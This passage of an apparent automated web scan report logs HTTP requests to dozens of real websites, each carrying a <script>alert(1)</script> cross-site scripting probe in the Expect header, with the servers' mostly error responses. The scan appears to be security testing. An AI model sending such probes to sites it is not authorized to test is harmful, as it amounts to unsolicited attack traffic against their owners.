Host:   http://www.easyipodtransfer.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.easyipodtransfer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:36:57 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.93. http://www.eautorepair.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eautorepair.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eautorepair.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:44:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.94. http://www.echosurvey.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.echosurvey.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.echosurvey.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 04:11:34 GMT
Connection: close
Content-Type: text/html
Content-Length: 108

<html><head><title>Object Not Found</title></head><body><h1>HTTP/1.1 404 Object Not Found</h1></body></html>

29.95. http://www.efoodsdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.efoodsdirect.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.efoodsdirect.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:48:09 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.96. http://www.eftours.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eftours.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eftours.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:49:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.97. http://www.elitemeet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elitemeet.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elitemeet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:21:41 GMT
Server: LiteSpeed
Connection: close
Content-Type: text/html
Content-Length: 613
Vary: User-Agent

Page Not Found
<!--

...[SNIP]...

29.98. http://www.endeavorsuite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.endeavorsuite.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.endeavorsuite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 04 May 2011 04:11:59 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

29.99. http://www.engcen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.engcen.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.engcen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 04:08:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8241
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDRTQRB=JPCCMCGACJDGOGODPJCKKOPG; path=/
Cache-control: private


<html>
<head>
<title>Engineering jobs, resumes & careers - engineers employment search</title>

<link rel="stylesheet" type="text/css" href="http://www.engcen.com/include/engcen.css">
<link rel
...[SNIP]...

29.100. http://www.exoticnudism.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exoticnudism.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.exoticnudism.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 03:23:22 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=30
Vary: Accept-Encoding
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.101. http://www.expertclick.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expertclick.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expertclick.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:34:02 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.102. http://www.extreme-review.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.extreme-review.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.extreme-review.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Wed, 04 May 2011 01:39:37 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.0.0</center>
</body>
</html>

29.103. http://www.fantasyteenageassault.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fantasyteenageassault.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fantasyteenageassault.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Wed, 04 May 2011 02:22:01 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

29.104. http://www.farmcollector.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.farmcollector.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.farmcollector.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:38:26 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.105. http://www.fatgirlfriend.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fatgirlfriend.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fatgirlfriend.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 04 May 2011 03:21:18 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.106. http://www.fatoldtube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fatoldtube.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fatoldtube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 04 May 2011 02:15:21 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.107. http://www.fcps.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fcps.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fcps.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404
Date: Wed, 04 May 2011 00:45:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3247
Content-Type: text/html
Cache-control: private


<html>
<head>
   <Title>Page not found</Title>
</head>
<body bgcolor=white>

       <center>
<TABLE border="0" cellPadding="5" cellSpacing="0" width="100%" align="center">
<TBODY>

...[SNIP]...

29.108. http://www.filmsandtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filmsandtv.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.filmsandtv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:04:31 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.109. http://www.filthyoldies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filthyoldies.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.filthyoldies.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Wed, 04 May 2011 03:59:05 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>

29.110. http://www.findaproperty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findaproperty.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.findaproperty.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:15:11 GMT
Content-Length: 60
Set-Cookie: TDPG=l2dvKdd/8nuRw1kmmbv8FBvoOLWMKrYq5v4l3M0fq8hmZQaE/7RbYSMr9UID93B4z/+vKK5dvcmUpds=; path=/

The page cannot be displayed because the expectation failed.

29.111. http://www.firstmaturetube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstmaturetube.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.firstmaturetube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 00:54:13 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.112. http://www.fiserv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fiserv.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fiserv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 39910
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:42:10 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head><!-- PageID 1859 - published by RedDot 7.5 - 7.5.1.91 - 14026 -->
<title>Fiserv - The Page You Requested Could Not Be Fou
...[SNIP]...

29.113. http://www.flashedition.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flashedition.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.flashedition.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Wed, 04 May 2011 00:59:27 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Vary: Accept-Encoding

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.63</center>
</body>
</html>

29.114. http://www.flychina.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flychina.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.flychina.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:02:38 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.115. http://www.foodinsurance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foodinsurance.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foodinsurance.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:02:02 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

29.116. http://www.fplayer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fplayer.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fplayer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


29.117. http://www.freelaptoptoday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freelaptoptoday.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freelaptoptoday.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:21:14 GMT
Server: UltraDNS Client Redirection Server
Last-Modified: Wed, 04 May 2011 02:21:14 GMT
Accept-Ranges: none
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head><title>UltraDNS Client Redirection Service</title></head>
<body><table border="2" width="100%">
<tr bgcolor="#FF4444"><th colspan="2"
...[SNIP]...

29.118. http://www.freemdeicalin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemdeicalin.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freemdeicalin.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Unknown
Content-Type: text/html
Date: Wed, 04 May 2011 01:51:42 GMT
Content-Length: 60
Set-Cookie: 7s51872mp2=805470218.20480.0000; path=/
Connection: close

The page cannot be displayed because the expectation failed.

29.119. http://www.freephonedelivery.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freephonedelivery.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freephonedelivery.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 01:40:36 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>

29.120. http://www.french-girls.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.french-girls.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.french-girls.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Wed, 04 May 2011 03:24:46 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.63</center>
</body>
</html>

29.121. http://www.futureelectronics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.futureelectronics.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.futureelectronics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Type: text/html
Cache-Control: no-cache
Date: Wed, 04 May 2011 01:09:59 GMT
Content-Length: 198
Connection: close

<html>
<head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www1.futureelectronics.com/ScheduledMaintenance.html">
<meta http-equiv="Expires" content="0">
</head>
<body>
</body>
</html>

29.122. http://www.fvfileserver.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fvfileserver.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fvfileserver.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Wed, 04 May 2011 01:34:22 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>

29.123. http://www.galvestoncruises.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.galvestoncruises.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.galvestoncruises.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:00:24 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.124. http://www.gbase.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gbase.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gbase.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=TaxYWZ1AzAEkAAAAMWE2NzMxMTgtOGI4Zi00ZjdjLTkxYzEtNWExNDhkYTJkNDIxUlAibIDq0KsXanPKKVuyzkLl0_M1; expires=Tue, 12-Jul-2011 14:09:43 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:29:43 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.125. http://www.gettraf.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gettraf.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gettraf.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:32:26 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

29.126. http://www.gfsale.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gfsale.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gfsale.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 02:47:05 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.127. http://www.giga-byte.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giga-byte.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.giga-byte.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:50:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.128. http://www.glittergraphicsnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.glittergraphicsnow.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.glittergraphicsnow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 04 May 2011 01:18:48 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.129. http://www.go2web20.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.go2web20.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.go2web20.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:27:57 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.130. http://www.greatbigsea.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greatbigsea.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatbigsea.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
web6: web6
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:47:48 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.131. http://www.greatfunnypictures.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greatfunnypictures.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatfunnypictures.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:05:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.132. http://www.greenlightsaver1.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenlightsaver1.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greenlightsaver1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


29.133. http://www.greetingsisland.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greetingsisland.com
Path:   /favicon.ico

Request

